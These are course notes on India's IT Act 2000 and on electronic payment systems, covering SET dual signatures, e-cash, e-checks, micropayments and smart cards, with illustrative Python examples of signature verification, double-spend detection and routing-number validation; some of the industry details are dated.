The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offenses and contraventions

4. Justice dispensation systems for cybercrimes

Offences -

Section | Offence | Punishment

65 | Tampering with computer source documents - intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years or/and with fine up to 2 lakh rupees

66 | Hacking | Imprisonment up to three years or/and with fine up to 5 lakh rupees

66-A | Sending offensive message through electronic means - sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


A payment gateway protects credit card details by encrypting sensitive information, such as credit card numbers, to ensure that information passes securely between the customer and the merchant, and also between the merchant and the payment processor.

How It works

Payments In India

Going the e-way

e-PAYMENT SYSTEM IN INDIA

• Ever-increasing technology changes

• Growing Internet access and mobile subscriber base

• Rising consumer confidence

• Convenient delivery/payment models

• India has been one of the fastest growing countries for payment cards in the Asia-Pacific region

• India currently has approximately 130 million cards (both debit and credit) in circulation


GROWTH IN e-PAYMENT SYSTEM

REGULATION -

The Reserve Bank of India (RBI) has been supportive of the development of electronic payments. In this direction, the "Payments and Settlement System Act" was enacted. Apart from being supportive, the RBI has also initiated various programs to encourage e-payments.

CHANNELS OF PAYMENT -

Indian banks have put in place various channels of electronic payments to encourage customers to adopt the electronic mode. Channels like the Internet, mobile, ATMs and drop boxes are some of the most frequently used channels, apart from bank branches.

MARKET MAPPING -

The e-payments processing market has two major players, namely Tech Process and Bill Desk, which is a pure-play electronic transaction processing company.

The Indian payment system is transforming from paper mode to electronic mode. Two main reasons for such a shift are:


1. The regulator has mandated routing all high-value transactions electronically to minimize the movement of money and risk.

2. At the retail end, customers are realizing the efficiency of electronic payments.

SHIFTS IN THE PAYMENT SYSTEM

TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT

• Electronic Clearing Service (Credit and Debit)

• National Electronic Fund Transfer (NEFT)

THE RULING PLASTIC MONEY

Credit cards

Debit cards

ATM Cards

PayPal

PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods such as checks and money orders. It is subject to the US economic sanction list and other rules and interventions required by US laws or government. PayPal is an acquirer, performing payment processing for online vendors, auction sites and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States, at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Scottsdale, Charlotte and Austin in the United States; Chennai in India; Dublin in Ireland; Kleinmachnow in Germany; and Tel Aviv in Israel. From July 2007, PayPal has operated across the European Union as a Luxembourg-based bank.

Google Wallet

Google Wallet was launched in 2011, serving a similar function as PayPal to facilitate payments and transfer money online. It also features highly robust security and additional features such as the ability to send payments as attachments via email.


CHARACTERISTICS OF PAYMENT SYSTEM

There is no paper involved, so electronic payments can be effected directly from home or office.

Fast, efficient, safe, secure and generally less costly than paper-based alternatives, e.g. cheques.

Electronic payments are fully traceable.

In Ireland, the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.

Most banks offer same-day value for payments made to other accounts held in that same bank.

Many banks offer same-day money transfer inter-bank services for large value payments.

Unlike cheques, electronic payments don't 'bounce', as payments will not be effected unless the funds are available in the first place.


Features of Payment Methods

• Anonymity: whether the payment method is anonymous

• Security: whether the payment method is secure

• Overhead cost: the overhead cost of processing a payment

• Transferability: whether a payment can be carried out without the involvement of a third party

• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment

• Acceptability: whether the payment method is supported globally

4C PAYMENTS METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system.

In the physical world there are 4 types of payment methods:

• Cash

• Credit card

• Check

• Credit/debit (Fund Transfer)

• A payment method should be:

– Very secure

– Having low overhead cost

– Transferable

– Acceptable anywhere

– Divisible

– Anonymous

Comparison of the 4C payment methods


SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.

• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the internet.

Disadvantage of SSL

• It is not a complete credit card payment method.

• For example, it cannot support on-line credit card authorization.

SET is specially developed to provide secure credit card payment over the internet. It is now widely supported by major credit card companies, including Visa and MasterCard.


• SET aims at satisfying the following security requirements in the context of credit card payment:

– Confidentiality - Sensitive messages are encrypted so that they are kept confidential.

– Integrity - Nearly all messages are digitally signed to ensure content integrity.

– Authentication - Authentication is performed through a public key infrastructure.

SET network architecture

Merchant: a seller which is connected to an acquirer.

Cardholder: a registered holder of the credit card, who is a buyer.

Issuer: the bank that issues the credit card to a cardholder.

Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers.

• A merchant can process various credit cards through a single acquirer.

• Payment Gateway: this is typically connected to the acquirer.

– The payment gateway is situated between the SET system and the financial network of the current credit card system for processing the credit card payment.

SET Digital Certificate System


Dual signature generation and verification -

• In the physical credit card system:

– the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;

– data integrity can basically be ensured by using printed receipts;

– cardholder authentication relies on simple signature checking only.

• In an electronic credit card system:

– the Order Information (OI) and PI can be digitally signed to ensure data integrity;

– the sensitive credit card information may still be disclosed to other people.

• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information.


How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.

• The dual signature can be verified as follows:

Step 1: The merchant first computes

H[ H[PI] || H[OI] ]

Step 2: He then decrypts the digital signature with the cardholder's public signature key as follows:

D_RSA[ DS | key_public_sign_cardholder ]

where

key_public_sign_cardholder = public signature key of the cardholder


Step 3: Finally, he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign_cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party.

If either the OI or PI is changed, the dual signature will no longer be valid.
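As an added, self-contained example (not from the original notes), the dual-signature construction and both verifications in Python, using a toy textbook-RSA key pair generated inside the block (far too small for real use; SET used certified keys and proper signature padding, which are omitted here as a simplification):

```python
import hashlib
import secrets


def H(data: bytes) -> bytes:
    """The hash used throughout the dual signature (SHA-256 here)."""
    return hashlib.sha256(data).digest()


def _is_probable_prime(n: int, rounds: int = 40) -> bool:
    """Miller-Rabin test, adequate for a toy key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand


def rsa_keygen(bits: int = 512):
    """Textbook RSA key pair ((n, e), (n, d)). Toy size, no padding: illustration only."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            break
    n = p * q
    return (n, e), (n, pow(e, -1, phi))


def rsa_sign(priv, digest: bytes) -> int:
    """The cardholder signs a digest with its private signature key."""
    n, d = priv
    return pow(int.from_bytes(digest, "big"), d, n)


def rsa_recover(pub, signature: int) -> int:
    """D_RSA[ signature | public key ]: recover the signed digest as an integer."""
    n, e = pub
    return pow(signature, e, n)


def make_dual_signature(pi: bytes, oi: bytes, priv) -> int:
    """DS = Sign( H[ H[PI] || H[OI] ] ): one signature binding PI and OI together."""
    return rsa_sign(priv, H(H(pi) + H(oi)))


def merchant_verify(oi: bytes, h_pi: bytes, ds: int, pub) -> bool:
    """The merchant receives OI, H[PI] and DS; PI itself is never disclosed to it."""
    expected = int.from_bytes(H(h_pi + H(oi)), "big")   # Step 1
    return expected == rsa_recover(pub, ds)              # Steps 2 and 3


def gateway_verify(pi: bytes, h_oi: bytes, ds: int, pub) -> bool:
    """The payment gateway receives PI, H[OI] and DS; OI itself is never disclosed to it."""
    expected = int.from_bytes(H(H(pi) + h_oi), "big")
    return expected == rsa_recover(pub, ds)


if __name__ == "__main__":
    pub, priv = rsa_keygen()
    # Constructed sample messages; the card number is a placeholder, not a real PAN.
    oi = b"order=42;item=textbook;amount=INR 500"
    pi = b"card=0000000000000000;exp=12/29;amount=INR 500"
    ds = make_dual_signature(pi, oi, priv)
    print("merchant:", merchant_verify(oi, H(pi), ds, pub))                        # True
    print("gateway: ", gateway_verify(pi, H(oi), ds, pub))                         # True
    print("altered OI:", merchant_verify(oi + b";discount=100", H(pi), ds, pub))   # False
```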

DIGITAL ENVELOPE -


SET PROTOCOL -

The SET protocol has four phases: initiation, purchase, authorization and capture.

First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.

In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.

In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.

Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card.

The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

Issuers

Customers

Merchants or traders

Regulators

Issuers can be banks or non-bank institutions.


Customers are referred to as users who spend E-Cash.

Merchants and traders are vendors who receive E-Cash.

Regulators are defined as related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts from various E-Cash issuers. Issuers typically handle accounting for customers and merchants.

Purchase: Customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted over the networks.

Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system -

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works:


This is a simple model of the E-cash payment system. It gives us the idea of how the e-cash payment system works. The model is explained properly in the upcoming slides.

The customer approaches his issuer's (bank's) site for accessing his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer will endorse those tokens to the merchant for acquiring services, for which the customer will authenticate the payment for the trader.


In the third phase, the trader will approach the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank will convert the tokens into electronic funds, and the same will be transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

A system that allows a person to pay for goods or services by transmitting a number from one computer to another.

Like the serial numbers on real currency notes, the E-cash numbers are unique.

This is issued by a bank and represents a specified sum of real money.


It is anonymous and reusable.

Electronic Cash Security

Complex cryptographic algorithms prevent double spending.

Anonymity is preserved unless double spending is attempted.

Serial numbers can allow tracing to prevent money laundering.
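An added example, not part of the original notes: a minimal issuer that mints E-cash tokens with unique serial numbers, debits the withdrawing account, and refuses a token presented a second time. The issuer's keyed MAC stands in for its signature (an assumption made for brevity); real schemes use blind signatures so the issuer cannot link a serial number to the customer who withdrew it, which this toy does not provide.

```python
import hashlib
import hmac
import secrets


class Issuer:
    """Bank that issues E-cash tokens and later redeems them for merchants.

    Assumption: a keyed MAC under the issuer's secret stands in for the
    issuer's digital signature, since the issuer is the only party that
    verifies tokens in the model above.
    """

    def __init__(self):
        self._key = secrets.token_bytes(32)
        self._spent = set()    # serial numbers already redeemed (double-spend check)
        self.balances = {}     # account name -> balance in rupees (constructed ledger)

    def open_account(self, name: str, balance: int) -> None:
        self.balances[name] = balance

    def _tag(self, serial: str, amount: int) -> str:
        msg = f"{serial}:{amount}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def withdraw(self, customer: str, denominations: list) -> list:
        """Debit the customer's account and return one token per denomination."""
        total = sum(denominations)
        if self.balances.get(customer, 0) < total:
            raise ValueError("insufficient funds")
        self.balances[customer] -= total
        tokens = []
        for amount in denominations:
            serial = secrets.token_hex(16)   # unique, like a banknote serial number
            tokens.append({"serial": serial, "amount": amount,
                           "tag": self._tag(serial, amount)})
        return tokens

    def redeem(self, merchant: str, token: dict) -> tuple:
        """A merchant deposits a token; returns (accepted, reason)."""
        expected = self._tag(token["serial"], token["amount"])
        if not hmac.compare_digest(expected, token["tag"]):
            return False, "forged or altered token"
        if token["serial"] in self._spent:
            return False, "double spending detected"
        self._spent.add(token["serial"])
        self.balances[merchant] = self.balances.get(merchant, 0) + token["amount"]
        return True, "credited"


if __name__ == "__main__":
    bank = Issuer()
    bank.open_account("alice", 500)
    bank.open_account("shop", 0)
    tokens = bank.withdraw("alice", [100, 100, 50])
    for t in tokens:
        print(bank.redeem("shop", t))        # (True, 'credited') three times
    print(bank.redeem("shop", tokens[0]))    # (False, 'double spending detected')
    print(bank.balances)                     # {'alice': 250, 'shop': 250}
```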

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is much more secure than other online payment modes because in this case no credential, such as card passwords or anything similar, is involved. It is simply like an online fund transfer from the customer's account to the trader's account.


However, while accessing the customer's account, the customer must keep in mind internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on safe "https" protocols, and using proper internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.

Electronic cash protects its user against theft. With electronic cash, the customer does not need to provide financial information.

E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit for additional charges, which is why very low payments are not charged a fee.

Limitations

However secure the e-cash payment system may be, still no one is safe against online fraud. In this case the trader is referred to as fraudulent: the trader may take the amount but not provide the services.

While making the payment, it is very important that the internet connection and power supply remain active. If the payment is in process and the internet supply fails in between, it can lead to loss of information, i.e. the amount will be charged but it will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.

E-Cash is not for everyone. Low income segments without computer and internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will make E-Cash more perfect. Countries such as India, where people were hesitant to use such methods, have shown a tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money; and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number, and after verification the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more:

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.

2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.

3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.

4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks.

5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your businessmdashand your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features:

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the echeck, and the public key is the key given to anyone who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways: from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize an electronic debit and enter the bank routing number (ABA) and account number.

2. The merchant's sales system securely transfers order information to CyberSource over the Internet.

3. CyberSource forwards the bank routing number and account number to the processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards approve/decline results to CyberSource.

5. CyberSource returns the approval/decline message to the merchant.

6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.
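The routing-number validation behind step 4 of the flow above, together with the duplicate detection mentioned earlier for scanned checks, as an added example in Python (not CyberSource's or any processor's code): the ABA checksum weights the nine digits 3, 7, 1 repeating and requires the sum to be a multiple of 10; the fingerprint used for duplicate detection (same account, check number and amount presented again) is an assumption, and the sample routing and account numbers are constructed.

```python
import hashlib
from decimal import Decimal

ABA_WEIGHTS = (3, 7, 1, 3, 7, 1, 3, 7, 1)


def valid_aba_routing_number(rtn: str) -> bool:
    """ABA routing transit number check: nine digits whose 3-7-1 weighted sum is a multiple of 10."""
    if len(rtn) != 9 or not rtn.isdigit():
        return False
    return sum(int(ch) * w for ch, w in zip(rtn, ABA_WEIGHTS)) % 10 == 0


def mask_account_number(acct: str) -> str:
    """Show only the last four digits on receipts and in logs."""
    digits = "".join(ch for ch in acct if ch.isdigit())
    return "*" * max(len(digits) - 4, 0) + digits[-4:]


class EcheckIntake:
    """Merchant-side pre-validation of payer bank data plus duplicate detection."""

    def __init__(self):
        self._seen = set()   # fingerprints of checks already submitted for settlement

    @staticmethod
    def _fingerprint(rtn: str, acct: str, check_no: str, amount: str) -> str:
        # Assumption: a duplicate is the same account, check number and amount presented again.
        raw = f"{rtn}|{acct}|{check_no}|{Decimal(amount):.2f}".encode()
        return hashlib.sha256(raw).hexdigest()

    def submit(self, rtn: str, acct: str, check_no: str, amount: str) -> tuple:
        """Returns (accepted, reason); never echoes the full account number."""
        if not valid_aba_routing_number(rtn):
            return False, "invalid routing number"
        acct_digits = "".join(ch for ch in acct if ch.isdigit())
        if not 4 <= len(acct_digits) <= 17:   # ACH account number field holds up to 17 digits
            return False, "invalid account number length"
        fp = self._fingerprint(rtn, acct_digits, check_no, amount)
        if fp in self._seen:
            return False, f"duplicate check {check_no} for account {mask_account_number(acct_digits)}"
        self._seen.add(fp)
        return True, (f"queued for ACH: account {mask_account_number(acct_digits)} "
                      f"check {check_no} amount {Decimal(amount):.2f}")


if __name__ == "__main__":
    intake = EcheckIntake()
    # "123456780" is a constructed number that satisfies the checksum; "123456789" does not.
    print(intake.submit("123456780", "000123456789", "1042", "125.00"))   # accepted
    print(intake.submit("123456780", "000123456789", "1042", "125.00"))   # duplicate
    print(intake.submit("123456789", "000123456789", "1043", "10.00"))    # invalid routing number
```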

Four Different Scenarios of the FSTC E-check System -


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as the micropayment method, is emerging to cater for very low value transactions. Examples:

Millicent (pre-payment/credit based), PayWord (post-payment)

PREPARED BY ARUN PRATAP SINGH 31

31

MICRO PAYMENT IS -

Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.
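The broker-based scheme just described, as an added example (not any provider's code): the broker holds the wallet, each per-fee link click yields an HMAC-signed token the seller can verify offline, and the broker accrues per-seller micropayments and pays them out once a threshold is reached. The token format, the 1/100-cent accounting unit and the $1.00 payout threshold are assumptions made for the demo.

```python
"""Broker-based micropayment aggregation (constructed example)."""
import hashlib
import hmac
import json
import secrets
from collections import defaultdict

UNIT = 100                      # accounting unit: 1/100 of a cent (assumed)


class Broker:
    """Third-party service provider that monitors, collects and distributes
    micropayments.  Balances are integers in 1/100-cent units so that
    fractions of a cent never touch floating point."""
    PAYOUT_THRESHOLD = 100 * UNIT      # assumed: pay a seller out at $1.00

    def __init__(self):
        self.wallets = {}                    # user -> balance
        self.seller_keys = {}                # seller -> shared HMAC key
        self.pending = defaultdict(int)      # seller -> accrued, not yet paid
        self.payouts = []                    # (seller, cents) paid out so far

    def open_wallet(self, user: str, prepaid_cents: int) -> None:
        self.wallets[user] = prepaid_cents * UNIT

    def register_seller(self, seller: str) -> bytes:
        key = secrets.token_bytes(32)        # shared with the seller out of band
        self.seller_keys[seller] = key
        return key

    def pay(self, user: str, seller: str, units: int, link_id: str):
        """Debit the user's wallet for one per-fee link and return a signed
        token; None if the seller is unknown or the wallet cannot cover it."""
        if seller not in self.seller_keys or units <= 0:
            return None
        if self.wallets.get(user, 0) < units:
            return None
        self.wallets[user] -= units
        self.pending[seller] += units
        token = {"seller": seller, "link": link_id, "units": units,
                 "nonce": secrets.token_hex(8)}
        token["mac"] = self._mac(self.seller_keys[seller], token)
        self._settle_if_due(seller)
        return token

    @staticmethod
    def _mac(key: bytes, token: dict) -> str:
        body = json.dumps({k: v for k, v in token.items() if k != "mac"},
                          sort_keys=True).encode()
        return hmac.new(key, body, hashlib.sha256).hexdigest()

    def _settle_if_due(self, seller: str) -> None:
        """Many small payments become one larger payout once the threshold
        is reached."""
        if self.pending[seller] >= self.PAYOUT_THRESHOLD:
            self.payouts.append((seller, self.pending[seller] // UNIT))
            self.pending[seller] = 0


class Seller:
    """Content seller: verifies tokens offline against its own price list."""

    def __init__(self, name: str, key: bytes, prices: dict):
        self.name, self.key, self.prices = name, key, prices
        self.seen_nonces = set()

    def accept(self, token: dict) -> bool:
        expected = Broker._mac(self.key, token)
        if not hmac.compare_digest(token.get("mac", ""), expected):
            return False                          # forged or tampered token
        if token["seller"] != self.name:
            return False                          # token meant for another seller
        if token["units"] != self.prices.get(token["link"]):
            return False                          # wrong price for this link
        if token["nonce"] in self.seen_nonces:
            return False                          # replayed token
        self.seen_nonces.add(token["nonce"])
        return True


if __name__ == "__main__":
    broker = Broker()
    key = broker.register_seller("news-site")
    seller = Seller("news-site", key, {"article-7": 50})   # 0.5 cent per article
    broker.open_wallet("alice", 200)                       # $2.00 prepaid
    token = broker.pay("alice", "news-site", 50, "article-7")
    print(seller.accept(token), seller.accept(token))      # second call is a replay
```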

Advantages and risks -

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer's side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small sums, security does not have the highest priority; much more important than security is trust. Users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before any return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options -

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card: Payment by credit card. The customer enters his or her credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure method (Verified by VISA and Mastercard SecureCode).

Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses -

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized with a microchip embedded on it

Two types:

Memory-only chips

Microprocessor chips

Can hold up to 32000 bytes

Newer smart cards have math co-processors

Perform complex encryption routines quickly

In 1968, German inventors patented the combination of plastic cards with micro chips

Construction of Smart Cards (figure not reproduced in this text)

Why Smart Cards -

Improve the convenience and security of any transaction

Provide tamper-proof storage of user and account identity

Provide vital components of system security

